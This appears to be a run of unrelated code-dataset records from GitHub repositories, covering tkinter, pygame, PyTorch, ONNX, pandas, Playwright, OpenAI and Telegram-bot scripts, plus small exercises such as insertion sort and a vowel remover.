tk.Entry(AssignmentsWindow, text=\"\")\n b.grid(row=i, column=j)\n b.pack()\n '''\n \n #To use tkintertable \n tframe = tk.Frame(AssignmentsWindow)\n tframe.pack() \n model = TableModel()\n table = TableCanvas(tframe, model=model)\n table.createTableFrame()\n \n model = table.model\n data = {'rec1': {'User': 'User1', 'Task': 'Task1', 'Status': 'Open', 'Rank': 1, 'Priority': 'High', 'Start Time': '05-19-2018 10:30', 'Finish Time': ''}, \n 'rec2': {'User': 'User2', 'Task': 'Task2', 'Status': 'Open', 'Rank': 2, 'Priority': 'Low', 'Start Time': '05-19-2018 11:30', 'Finish Time': '05-19-2018 22:30'},\n 'rec3': {'User': 'User3', 'Task': 'Task3', 'Status': 'Open', 'Rank': 3, 'Priority': 'Low', 'Start Time': '05-19-2018 12:30', 'Finish Time': '05-19-2018 22:45'} \n } \n model.importDict(data) #Import from a dictionary to populate model\n table.redrawTable()\n \n AssignmentsWindow.mainloop()\n\n#Menu Actions of Task \ndef MenuTask():\n TaskWindow = tk.Toplevel(window)\n TaskWindow.title(\"Add New Tasks\") \n TaskWindow.geometry('800x500')\n \n TaskList = [\n \"Add Task\"\n ] \n TaskVariable = StringVar(TaskWindow)\n TaskVariable.set(TaskList[0]) # default value \n TaskOptionMenu = tk.OptionMenu(TaskWindow, TaskVariable, *TaskList)\n TaskOptionMenu.pack() \n \n def AddTask():\n tkMessageBox.showinfo('WLabs Replenisher', 'Successfully Add New Task') \n \n AddTaskBT = tk.Button(TaskWindow, text=\"Add Task\", command=AddTask)\n AddTaskBT.pack()\n \n #To use tkintertable \n tframe = tk.Frame(TaskWindow)\n tframe.pack() \n model = TableModel()\n table = TableCanvas(tframe, model=model)\n table.createTableFrame()\n \n model = table.model\n data = {'rec1': {'ID': 'Task1', 'Priority': 'High' }, \n 'rec2': {'ID': 'Task2', 'Priority': 'Low' },\n 'rec3': {'ID': 'Task3', 'Priority': 'Low' } \n } \n model.importDict(data) #Import from a dictionary to populate model\n table.redrawTable()\n \n #Add New Row button\n def AddRowButton():\n table.addRow() \n table.redrawTable() \n \n AddRowBTN = tk.Button(TaskWindow,text='Add New Row', command = AddRowButton)\n AddRowBTN.place(relx=0.9, rely=0.15, anchor=tk.CENTER) \n \n TaskWindow.mainloop()\n\n#Menu Actions of User \ndef MenuUser():\n UserWindow = tk.Toplevel(window)\n UserWindow.title(\"Add New User\") \n UserWindow.geometry('800x500')\n \n UserList = [\n \"Add User\"\n ] \n UserVariable = StringVar(UserWindow)\n UserVariable.set(UserList[0]) # default value \n UserOptionMenu = tk.OptionMenu(UserWindow, UserVariable, *UserList)\n UserOptionMenu.pack()\n \n def AddUser():\n tkMessageBox.showinfo('WLabs Replenisher', 'Successfully Add New User') \n \n AddUserBT = tk.Button(UserWindow, text=\"Add User\", command=AddUser)\n AddUserBT.pack()\n \n #To use tkintertable \n tframe = tk.Frame(UserWindow)\n tframe.pack() \n model = TableModel()\n table = TableCanvas(tframe, model=model)\n table.createTableFrame()\n \n model = table.model\n data = {'rec1': {'ID': 'User1', 'First Name': 'Tom', 'Last Name': 'Cross' }, \n 'rec2': {'ID': 'User2', 'First Name': 'Jim', 'Last Name': 'Wood' },\n 'rec3': {'ID': 'User3', 'First Name': 'Bryan', 'Last Name': 'Bush' } \n } \n model.importDict(data) #Import from a dictionary to populate model\n table.redrawTable()\n\n #Add New Row button\n def AddRowButton():\n table.addRow() \n table.redrawTable() \n \n AddRowBTN = tk.Button(UserWindow,text='Add New Row', command = AddRowButton)\n AddRowBTN.place(relx=0.9, rely=0.15, anchor=tk.CENTER) \n \n UserWindow.mainloop()\n\n#End of Menu Actions \n \n#Help info\ndef MenuHelp():\n tkMessageBox.showinfo('WLabs Replenisher', 'WLabs, Great!') \n\n#Menu Items\nmenu = Menu(window)\nReplenisherItem = Menu(menu, tearoff=0)\nReplenisherItem.add_command(label='Assignments', command = MenuAssignments)\nReplenisherItem.add_separator()\nReplenisherItem.add_command(label='Tasks', command = MenuTask)\nReplenisherItem.add_separator()\nReplenisherItem.add_command(label='Users', command = MenuUser)\nmenu.add_cascade(label='Select Replenisher Tasks', menu=ReplenisherItem)\n\nHelpMenu = Menu(menu, tearoff=0)\nHelpMenu.add_command(label=\"About Walmart Labs\", command = MenuHelp) \nmenu.add_cascade(label=\"Help\", menu=HelpMenu) \n\nwindow.config(menu=menu)\n\nwindow.mainloop() \n\n\n","repo_name":"hyu21/Replenisher","sub_path":"WLabs.py","file_name":"WLabs.py","file_ext":"py","file_size_in_byte":6993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26899433295","text":"# -*- coding: utf-8 -*-\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='3'\n\nimport pixellib\nfrom pixellib.semantic import semantic_segmentation\nfrom pixellib.instance import instance_segmentation\n\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\n\ndef imgg(immg):\n segment_image = semantic_segmentation()\n segment_image.load_pascalvoc_model(\"./deeplabv3_xception_tf_dim_ordering_tf_kernels.h5\") \n segment_image.segmentAsPascalvoc(\"./\"+immg, output_image_name = \"static/\"+immg, overlay = True)\n\ndef pimgg(immg):\n segment_image = instance_segmentation()\n segment_image.load_model(\"./mask_rcnn_coco.h5\") \n segment_image.segmentImage(\"./\"+immg, output_image_name = \"static/2\"+immg)\n","repo_name":"paolodavid/Image-Segmentation","sub_path":"model1.py","file_name":"model1.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21914379030","text":"from worldobject import *\n\n\nclass DamageEffect(WorldObject):\n image = None\n\n def __init__(self, tile_map):\n super().__init__(tile_map)\n if DamageEffect.image is None:\n DamageEffect.image = get_image('txt_critical.png')\n self.renderer = PSpriteObject(DamageEffect.image)\n self.add_element(self.renderer)\n\n def update(self, delta_time):\n super().update(delta_time)\n factor = self.time * 3\n smooth_factor = 4 * factor ** 3 - 6 * factor ** 2 + 3 * factor\n self.renderer.set_position(Vector2(0, 20 + smooth_factor * 20) / PIXEL_PER_UNIT)\n self.renderer.set_scale(Vector2(1, 2 - smooth_factor * 2))\n if factor >= 1:\n self.get_parent().remove_world_object(self)","repo_name":"Yupdown/2DGameProgramming","sub_path":"source/damageeffect.py","file_name":"damageeffect.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6774338271","text":"#!/usr/bin/env python\nimport matplotlib.pyplot as plt\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(range(10))\n\nfor line in ax.get_xticklines() + ax.get_yticklines():\n line.set_markersize(10)\n\nplt.show()\n","repo_name":"apttyp/extraLearn","sub_path":"extra_lesson/demo_pic.py","file_name":"demo_pic.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24972449198","text":"# -*- coding: utf-8 -*-\n\"\"\" Util functions \"\"\"\n\n\ndef get_init_params(obj):\n init_params = obj.__init__.__code__.co_varnames\n obj_params = obj.__dict__.items()\n return {param: value for param, value in obj_params if param in init_params}\n\n\ndef object_init(obj):\n init_params = get_init_params(obj)\n return '{}(**{})'.format(obj.__class__.__name__, init_params)\n\n\ndef serialize(obj, name=None, result=None):\n \"\"\" Serialize an object to a dict \"\"\"\n if result is None:\n result = {}\n\n def make_name(obj, name=None):\n objname = obj.__class__.__name__\n if name is None:\n # name = objname\n return '({})'.format(objname)\n return '{} ({})'.format(name, objname)\n\n name = make_name(obj, name)\n\n try:\n # If it is an object, it has a __dict__\n obj_attr = obj.__dict__\n except AttributeError:\n # If it's NOT an object\n if isinstance(obj, (tuple, list)):\n newlist = []\n for element in obj:\n newlist.append(serialize(element))\n result[name] = newlist\n elif isinstance(obj, (dict,)):\n newdict = {}\n for key, element in obj.items():\n newdict[key] = serialize(element)\n result[name] = newdict\n else:\n result[name] = obj\n else:\n # If it IS an object\n attrs = {}\n result[name] = attrs\n for attr_name, attr_value in obj_attr.items():\n serialize(attr_value, attr_name, attrs)\n\n return result\n","repo_name":"fitoprincipe/geebap","sub_path":"geebap/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"37"} +{"seq_id":"1652820277","text":"import os\nfrom playwright.sync_api import Page, expect, sync_playwright\n\n\ndef check_and_write(url, tries=0, max_tries=9):\n if tries > max_tries:\n return False\n try:\n page.goto(url)\n page.wait_for_load_state('domcontentloaded')\n html = page.content()\n with open('data/cookie_table/consolidated_html/{}.html'.format(url.replace('/', '-|slash|-')), 'w') as outfile:\n outfile.write(html)\n return True\n except Exception as e:\n print(e)\n return check_and_write(url, tries + 1)\n\n\nwith sync_playwright() as playwright:\n chromium = playwright.chromium\n browser = chromium.launch()\n context = browser.new_context()\n context.set_default_timeout(5000)\n page = context.new_page()\n everything_dict = {'nothing': [], 'cookie_declaration': [], 'cookie_settings': [], 'other': [], 'entities': [], 'purposes': [], 'activities': [], 'false_positive': []}\n\n with open('data/cookie_table/actual_cookie_tables.csv', 'r') as infile:\n for line in infile:\n split = line.strip().split(',')\n url = split[0]\n store = False\n if '0' in split[1]:\n if url not in everything_dict['nothing']:\n everything_dict['nothing'].append(url)\n if '1' in split[1]:\n if url not in everything_dict['cookie_declaration']:\n everything_dict['cookie_declaration'].append(url)\n store = True\n if '2' in split[1]:\n if url not in everything_dict['cookie_settings']:\n everything_dict['cookie_settings'].append(url)\n store = True\n if '3' in split[1]:\n if url not in everything_dict['other']:\n everything_dict['other'].append(url)\n store = True\n if '4' in split[1]:\n if url not in everything_dict['entities']:\n everything_dict['entities'].append(url)\n store = True\n if '5' in split[1]:\n if url not in everything_dict['purposes']:\n everything_dict['purposes'].append(url)\n store = True\n if '6' in split[1]:\n if url not in everything_dict['activities']:\n everything_dict['activities'].append(url)\n store = True\n if '7' in split[1]:\n if url not in everything_dict['false_positive']:\n everything_dict['false_positive'].append(url)\n if store:\n if check_and_write(url):\n print('Passed')\n else:\n print('Failed')\n with open('data/cookie_table/parsed_annotations.csv', 'w') as outfile:\n for key, val in everything_dict.items():\n outfile.write('{},{}\\n'.format(key, len(val)))\n","repo_name":"byron123t/cookie-tables","sub_path":"src/download_pages.py","file_name":"download_pages.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34806099278","text":"import torch\nfrom transformers import (\n AutoModelForCausalLM,\n AutoTokenizer,\n BitsAndBytesConfig,\n)\nfrom peft import PeftModel\nimport json\n\nmodel_path = \"akjindal53244/Arithmo-Mistral-7B\"\n\nfrom datasets import load_dataset, concatenate_datasets\n\ndevice_map = {\"\": 0}\n\nft_model = AutoModelForCausalLM.from_pretrained(\n model_path,\n device_map=device_map\n)\n\ntokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)\ntokenizer.pad_token = tokenizer.eos_token\n\npredictions = list()\n\nmath_test = load_dataset(\"competition_math\")\ndataset_size = len(math_test['test'])\nprint(f\"math_test size: {dataset_size}\")\n\ncount = 0\n# Adjust batch size based on available memory.\nbatch_size = 6\n\nfor i in range(0, dataset_size, batch_size):\n start = i\n end = start + batch_size if start + batch_size <= dataset_size else dataset_size\n examples = math_test[\"test\"][start:end]\n input_text_ft = [f\"Question: {each}\\n\\nAnswer:\" for each in examples[\"problem\"]]\n inputs_ft = tokenizer(input_text_ft, return_tensors=\"pt\", padding=True).to(\"cuda\")\n generated_ids = ft_model.generate(**inputs_ft, max_new_tokens=2048, temperature=0.0)\n output = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)\n for j in range(len(output)):\n predictions.append(\n {\n \"question\": examples[\"problem\"][j],\n \"ground_truth\": examples['solution'][j],\n \"prediction\": output[j]\n }\n )\n count += len(output)\n print(count)\n\nwith open('data/predictions/gsm8k/Arithmo-Mistral-7B/predictions_Arithmo_MATH_zero_shot_CoT.json', 'w') as f:\n json.dump(predictions, f, indent=1)\n\n\n","repo_name":"akjindal53244/Arithmo-Mistral-7B","sub_path":"eval/MATH/MATH_generate_response_zero_shot_CoT.py","file_name":"MATH_generate_response_zero_shot_CoT.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"34949761261","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\n\"\"\"\nIn the main function load a data set of municipal information\nfrom the src folder (originally from Statistics Finland). Use\nthe function pd.read_csv(), and note that the separator is a\ntabulator.\n\nPrint the shape of the DataFrame (number of rows and columns)\nand the column names in the following format:\n\nShape: r,c\nColumns:\ncol1 \ncol2\n...\n\"\"\"\n\ndef main():\n data_frame = pd.read_csv(\"src/municipal.tsv\", sep=\"\\t\")\n\n rows, columns = data_frame.shape\n\n print(f\"Shape: {rows}, {columns}\")\n print(\"Columns:\")\n for i in data_frame:\n print(i)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mjauvo/MOOC_Data_Analysis_with_Python_2022","sub_path":"part04/part04-e03_municipal_information/src/municipal_information.py","file_name":"municipal_information.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7176837060","text":"def insertionsort(l):\n n = len(l)\n if n < 1:\n return l\n for i in range(n):\n j=i\n while(j>0 and l[j][0]0 and int(l[j][1:])= len(animation):\n self.frame_index = 0\n \n image = animation[int(self.frame_index)]\n\n if self.facing_right:\n self.image = image\n else:\n flipped_image = pygame.transform.flip(image, True, False)\n self.image = flipped_image\n \n # set the rect\n if self.on_ground and self.on_right:\n self.rect = self.image.get_rect(bottomright = self.rect.bottomright)\n elif self.on_ground and self.on_left:\n self.rect = self.image.get_rect(bottomleft = self.rect.bottomleft)\n elif self.on_ground:\n self.rect = self.image.get_rect(midbottom = self.rect.midbottom)\n if self.on_ceiling and self.on_right:\n self.rect = self.image.get_rect(topright = self.rect.topright)\n elif self.on_ceiling and self.on_left:\n self.rect = self.image.get_rect(topleft = self.rect.topleft)\n elif self.on_ceiling:\n self.rect = self.image.get_rect(midtop = self.rect.midtop)\n else:\n self.rect = self.image.get_rect(center = self.rect.center)\n\n\n def get_input(self):\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_RIGHT]:\n self.direction.x = 1\n self.facing_right = True\n elif keys[pygame.K_LEFT]:\n self.direction.x = -1\n self.facing_right = False\n else:\n self.direction.x = 0\n\n if keys[pygame.K_c] and (keys[pygame.K_c] != self.keys_hist[pygame.K_c]) and self.direction.x != 0 and self.dashes > 0:\n pygame.mixer.Sound.play(self.dash_sound)\n self.direction.x *= 15\n self.dashes -= 1\n\n if keys[pygame.K_SPACE] and self.on_ground:\n\n pygame.mixer.Sound.play(self.jump_sound)\n\n self.jump()\n\n self.keys_hist = keys\n\n \n def get_state(self):\n if self.direction.y < 0:\n self.state = 'jump'\n self.animation_speed = 0.1\n elif self.direction.y > self.gravity:\n self.state = 'fall'\n self.animation_speed = 0.1\n elif self.direction.x != 0:\n self.state = 'run'\n self.animation_speed = 0.3\n else:\n self.state = 'idle'\n self.animation_speed = 0.15\n \n\n def apply_gravity(self):\n self.direction.y += self.gravity\n self.rect.y += self.direction.y\n \n \n def jump(self):\n self.direction.y = self.jump_speed\n \n def update(self):\n self.get_input()\n self.get_state()\n self.animate()\n","repo_name":"const-sambird/hacklahoma23","sub_path":"src/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25759397242","text":"\"\"\"\r\n@author: JerryYang\r\n@file: openai改造01.py\r\n@time: 2023/2/6 15:00\r\n@desc: 增加功能:将返回德数据使用pyttsx3模块转换为语音\r\n\"\"\"\r\n\r\nimport pyttsx3\r\nimport openai\r\n\r\nopenai.api_key = '************************8'\r\n\r\nques = input(\"请输入你要问的问题:\")\r\nresponse = openai.Completion.create(\r\n model=\"text-davinci-003\",\r\n prompt=f\"Q:{ques}?\\nA:\",\r\n temperature=0,\r\n max_tokens=1024,\r\n top_p=1.0,\r\n frequency_penalty=0.0,\r\n presence_penalty=0.0\r\n)\r\nprint(response)\r\n# resp_text = response.get('choices')[0].get('text')\r\nresp_text = response.choices[0].text\r\n# print(type(response.get('choices')))\r\n# print(type(response.get('choices')[0]))\r\nprint(\"问:\", ques)\r\nprint(\"AI回答内容:\", resp_text)\r\n\r\n# resp_text = '明天中国广东佛山的天气预报是晴转多云,最高气温30℃,最低气温22℃,风力3-4级。'\r\n\r\n# 初始化tts引擎\r\nengine = pyttsx3.init()\r\n\r\n# 获取voices列表\r\nvoices = engine.getProperty('voices')\r\n# 循环用不同voices播报\r\nfor voice in voices:\r\n # 设置发音人声音\r\n engine.setProperty('voice', voice.id)\r\n print(voice.id)\r\n # 调用引擎say()方法,开始朗读\r\n engine.say(resp_text)\r\n\r\n# 等待语音播放完成\r\nengine.runAndWait()\r\n\r\n'''\r\n运行输出:\r\nD:\\pythonProject\\pythonProject\\openai\\Scripts\\python.exe D:/pythonProject/pythonProject/openai-demo.py\r\n\r\n\r\n明天中国广东佛山的天气预报是晴转多云,最高气温30℃,最低气温22℃,风力3-4级。\r\n\r\nProcess finished with exit code 0\r\n'''\r\n\r\n'''\r\n# 参数\r\n model:使用的模型:\"code-davinci-002\"/\"text-davinci-003\"\r\n prompt: 生成提示,每个model的提示语不一样,需要注意\r\n temperature:创新采样,让结果更新颖,就调大值。\r\n top_p:情绪采样\r\n frequency_penalty:频率处罚系数\r\n presence_penalty:重复处罚系数\r\n stop:停止词\r\n\r\n'''\r\n'''\r\n语速控制\r\nengine = pyttsx3.init()\r\nrate = engine.getProperty('rate')\r\nengine.setProperty('rate', rate+50)\r\nengine.say('The quick brown fox jumped over the lazy dog.')\r\nengine.runAndWait()\r\n\r\n音量控制\r\nengine = pyttsx3.init()\r\nvolume = engine.getProperty('volume')\r\nengine.setProperty('volume', volume-0.25)\r\nengine.say('The quick brown fox jumped over the lazy dog.')\r\nengine.runAndWait()\r\n'''\r\n'''\r\n请输入你要问的问题:以下是某公司四个工厂产品制造检验合格率,请分析其中的问题:8010:86.1%、8020:99.1%、8030:94.4%、8040:93.0%、8050:87.3%\r\n\r\n从上述数据可以看出,8020工厂的产品检验合格率最高,达到99.1%,而8050工厂的产品检验合格率最低,只有87.3%,这表明8050工厂的产品质量控制存在问题,需要加强管理和改进技术。\r\n'''\r\n","repo_name":"JerryYangJ/MyFirstProject","sub_path":"openai/openai改造02.py","file_name":"openai改造02.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9398618348","text":"import onnxruntime as rt\nimport os\nimport numpy as np\nfrom pathlib import Path\n\n\nROOT = Path(os.path.realpath(os.path.expanduser(__file__))).parents[0]\nSESS = rt.InferenceSession(str(ROOT / \"fashion-mnist.onnx\"))\n\n\nclass Model(object):\n onnx_session = SESS\n input_name = onnx_session.get_inputs()[0].name\n\n class_names = [\n 'T-shirt/top',\n 'Trouser',\n 'Pullover',\n 'Dress',\n 'Coat',\n 'Sandal',\n 'Shirt',\n 'Sneaker',\n 'Bag',\n 'Ankle boot'\n ]\n\n @staticmethod\n def metadata():\n return {\n 'signature_name': 'serving_default',\n 'inputs': {\n 'image_data': {\n 'dtype': 'float'\n }\n },\n 'outputs': {\n 'class_probabilities': {\n 'dtype': 'float'\n }\n }\n }\n\n @classmethod\n def predict(cls, data):\n y_pred = cls.onnx_session.run(\n None,\n {\n cls.input_name: data['image_data'].astype(np.float32)\n }\n )\n\n return y_pred\n","repo_name":"cwetherill-ps/onnx-deployment","sub_path":"models/fashion-mnist/fashion-mnist.py","file_name":"fashion-mnist.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70759161645","text":"def main():\n word = input(\"Input: \")\n print(f\"Output: {shorten(word)}\")\n\n\ndef shorten(word: str) -> str:\n \"\"\"\n Shorten a word by removing vowels\n Args:\n word: a string inputted that may have vowels either upper or lower case\n Returns: a copy of the inputted word but without any vowels\n \"\"\"\n vowels = ['a', 'e', 'u', 'o', 'i', 'A', 'E', 'U', 'I', 'O']\n shorten_word = word\n for char in word:\n # This if-statement just make sure that the sentence will have meanings if it starts with a vowel like 'i'\n # if char == word[0]:\n # continue\n if char in vowels:\n shorten_word = shorten_word.replace(char, '')\n return shorten_word\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DeoGM2911/CS50P","sub_path":"set5/twttr/twttr.py","file_name":"twttr.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"26880236924","text":"import tensorflow as tf\n\nfrom mayo.override import util\nfrom mayo.override.base import Parameter\nfrom mayo.override.prune.base import PrunerBase\n\n\nclass FilterPruner(PrunerBase):\n density = Parameter('density', 0.0, [], 'float')\n mask = Parameter('mask', None, None, 'bool')\n\n def __init__(self, session, density=None, should_update=True):\n super().__init__(session, should_update)\n self.density = density\n\n def _apply(self, value):\n self._parameter_config = {\n 'mask': {\n 'initial': tf.ones_initializer(dtype=tf.bool),\n 'shape': tf.TensorShape([value.shape[-2], value.shape[-1]]),\n }\n }\n return value * util.cast(self.mask, float)\n\n def _l1_norm(self, value):\n # compute l1 norm for each filter\n axes = len(value.shape)\n assert axes == 4\n # mean, var = tf.nn.moments(util.abs(tensor), axes=[0, 1])\n # mean = np.mean(value, axis=(0, 1))\n # var = np.var(value, axis=(0, 1))\n # return mean + util.sqrt(var)\n return util.sum(util.abs(value), axis=(0, 1))\n\n def _threshold(self, value, density):\n value = value.flatten()\n index = int(value.size * density)\n return sorted(value)[index]\n\n def _updated_mask(self, tensor, mask):\n value, mask, density = self.session.run([tensor, mask, self.density])\n l1_norm = self._l1_norm(value)\n # mean, var = tf.nn.moments(util.abs(tensor), axes=[0, 1])\n return l1_norm > self._threshold(l1_norm, density)\n\n def _info(self):\n _, mask, density, count = super()._info()\n density = self.session.run(self.density)\n return self._info_tuple(\n mask=mask, density=density, count_=count)\n\n @classmethod\n def finalize_info(cls, table):\n footer = super().finalize_info(table)\n table.set_footer([None] + footer)\n","repo_name":"deep-fry/mayo","sub_path":"mayo/override/prune/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"19"} +{"seq_id":"27959370779","text":"import os\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\n\n'''Neural Network'''\n\n# neural network\n# is a collection of neurons that are connected by layers\n# each neuron is a small computing unit\n# that performs simple calculations to collectively solve a problem\n# they are organised in layers\n# 3 types of layers - input layer, hidden layer and outter layer\n# Each layers contain a number of neurons, except for the input layer\n\n# components of a neural network\n# activation function -\n# determines whether a neuron should be activated or not\n# if a neuron activates, then it means the input is important\n# it adds non-linearity to the model\n\n# Weights\n# influence how well the output of our network will come close to the expected output value\n# weights for all neurons in a layer are organised into one tensor\n\n# bias\n# makes up the difference between the activation function's output and its intended output\n\n\n'''Build a neural network'''\n# neural networks are comprised of layers/modules that perform operations on data\n# torch.nn - provides all the building blocks you need to build your own neural network\n# Every module in pytorch subclasses the nn.module\n# a neural network is a module itself that consists of other modules (layers)\n\n\n# to check if torch.cuda is availble, else use cpu\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nprint('Using {} device'.format(device))\n\n# every nn.module subclass implements the operations on input data in the forward method\n\n\nclass NeuralNetwork(nn.Module):\n def __init__(self):\n super(NeuralNetwork, self).__init__()\n self.flatten = nn.Flatten()\n self.linear_relu_stack = nn.Sequential(\n nn.Linear(28*28, 512), # First linear Module - input layer 28*28 or 784 features - takes this and transform it to a hidden layer with 512 features\n nn.ReLU(),\n nn.Linear(512, 512), # Second linear Module - take 512 features as input from the first hidden layer and transforms it to the next hidden layer with 512 features\n nn.ReLU(),\n nn.Linear(512, 10), # Third linear Module - take 512 features as input from the second hidden layer and transforms it to the output layer with 10\n nn.ReLU(),\n )\n\n def forward(self, x):\n x = self.flatten(x)\n logits = self.linear_relu_stack(x)\n return logits\n\n\nmodel = NeuralNetwork().to(device)\nprint(model)\n\n\n# to use the model, we pass it the input data\n# this executes the models forward, along with some background operations\n\nX = torch.rand(1, 28, 28, device=device)\n# print(X)\nlogits = model(X)\npred_probab = nn.Softmax(dim=1)(logits)\ny_pred = pred_probab.argmax(1)\nprint(f\"Predicted class: {y_pred}\")\n\n'''Weight and bias'''\n# nn.linear module randomly initializes the weight and bias for each layer\n\nprint(f\"First Linear weights: {model.linear_relu_stack[0].weight} \\n\")\nprint(f\"First linear bias: {model.linear_relu_stack[0].bias}\\n\")\n\n# model layers - 3 images of size 28*28\ninput_image = torch.rand(3,28,28)\nprint(input_image.size())\n\n# nn.flatten layer - to convert each 2d 28*28 image into 784 pixel\nflatten = nn.Flatten()\nflat_image = flatten(input_image)\nprint(flat_image.size())\n\n# nn.Linear\n# a module that applies a linear transformation on the input using it's stored weights and biases\nlayer1 = nn.Linear(in_features=28*28, out_features=20)\nhidden1 = layer1(flat_image)\nprint(hidden1.size())\n\n# nn.ReLU\n# the ReLU activation function takes the output from the linear layer calculation and replaces the negative values with zero\nprint(f\"Before ReLU: {hidden1}\\n\\n\")\nhidden1 = nn.ReLU()(hidden1)\nprint(f\"After RELU:{hidden1}\\n\\n\")\n\n# nn.sequential\n\nseq_modules = nn.Sequential(\n flatten,\n layer1,\n nn.ReLU(),\n nn.Linear(20, 10)\n)\ninput_image = torch.rand(3, 28, 28)\nprint(input_image)\nlogits = seq_modules(input_image)\nprint(\" \")\nprint(logits)\n\nprint(\" \")\nsoftmax = nn.Softmax(dim=1)\npred_probab = softmax(logits)\nprint(pred_probab)\n\nprint(\"model structure: \", model, \"\\n\\n\")\n\nfor name, param in model.named_parameters():\n print(f\"Layer: {name} | Size: {param.size()} | Values : {param[:2]} \\n\")\n\n","repo_name":"bethelmelesse/pytorch_azure_02","sub_path":"unit_4.py","file_name":"unit_4.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31113148297","text":"#!/usr/bin/python3\nfrom aiogram.utils import executor\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.dispatcher import FSMContext\nfrom middlewares import rate_limit\nfrom memory_profiler import memory_usage\nimport numpy as np\nfrom functions import *\nfrom loader import *\n\n\n# ---------------------------------------------------- handlers ----------------------------------------------------\n@dp.message_handler(content_types=['sticker'])\nasync def get_sticker_id(message: types.Message):\n if message.from_user.id in config.admins_list:\n await message.answer(message.sticker.file_id)\n\n\n@dp.message_handler(commands=['get_mess_id'])\nasync def get_mess_id(message: types.Message):\n if message.from_user.id in config.admins_list:\n await message.answer(message.message_id)\n\n\n@dp.message_handler(commands=['make_dot'])\nasync def return_message_id(message: types.Message):\n if message.from_user.id == config.admin_id:\n res = await bot.send_message(config.profile_id, '.')\n await bot.send_message(config.admin_id, res)\n\n\n@dp.message_handler(commands=['make_rating'])\nasync def make_rating(message: types.Message):\n if message.from_user.id in config.admins_list:\n await make_rating_func()\n\n\n@rate_limit(limit=3)\n@dp.message_handler(commands=['start'])\nasync def start(message: types.Message):\n if message.chat.type == 'private':\n if not DB.user_exists(message.from_user.id):\n try:\n await bot.send_sticker(message.from_user.id,\n sticker='CAACAgIAAxkBAAIC2GKAGAP-qBGC5YInxh5PRu_8qJ_AAAKkHgAC1NEAAUgEnMSQXPUUySQE')\n except:\n pass\n\n mess = f\"Здравствуй, {message.from_user.first_name} ! Приветствуем👋 вас в боте, \" \\\n f\"созданном для оперативного(быстрого) нахождения исполнителя какого-либо вузовского задания. \" \\\n f\"Будь то чертёж по начерталке✏️, или же расчётка по сопромату, ты точно найдёшь нужного тебе человека🤝.\" \\\n f\"\\n\\nМы - те, кто не первый год помогаем ребятам с различным проблемами.\" \\\n f\" И дабы облегчить вам процесс нахождения 🔎 помощника, мы создали этого бота.\" \\\n f\"\\n\\nСоветую нажать /help ,чтобы разобраться в функционале.\"\n await bot.send_message(message.chat.id, mess)\n mess = 'P.S. разработчики бота не несут ответственности за взаимоотношения между участниками'\n await bot.send_message(message.chat.id, mess)\n DB.new_row_user_db(user_id=message.from_user.id, name=message.from_user.first_name)\n DB.all_users_list = DB.all_list()\n\n start_command = message.text\n refer_id = str(start_command[7:])\n if str(refer_id) != '':\n if str(refer_id) != str(message.from_user.id):\n DB.update_in_user(user_id=message.from_user.id, dict_values={'refer_id': int(refer_id)})\n try:\n await bot.send_message(refer_id, 'По вашей ссылке зарегистровался новый пользователь!')\n except:\n pass\n else:\n await message.answer('Нельзя регистрироваться по своей ссылке!')\n\n\n@rate_limit(limit=3)\n@dp.message_handler(commands=['my_profile'])\nasync def my_profile(message: types.Message):\n if message.chat.type == 'private':\n user_id = message.from_user.id\n if user_id in DB.ban_users_list:\n await message.answer('Вы забанены!')\n return\n count_refer = DB.get_count_referals(user_id=user_id)\n refer_info = f'Ваша реферальная ссылка:\\n' \\\n f'https://t.me/{config.BOT_NICKNAME}?start={message.from_user.id}\\n' \\\n f'Количество рефералов: {count_refer}\\n'\n if DB.decider_exists(user_id):\n profile_id = DB.get_profile_id(user_id)\n await bot.forward_message(chat_id=user_id,\n from_chat_id=config.profile_id,\n message_id=profile_id)\n 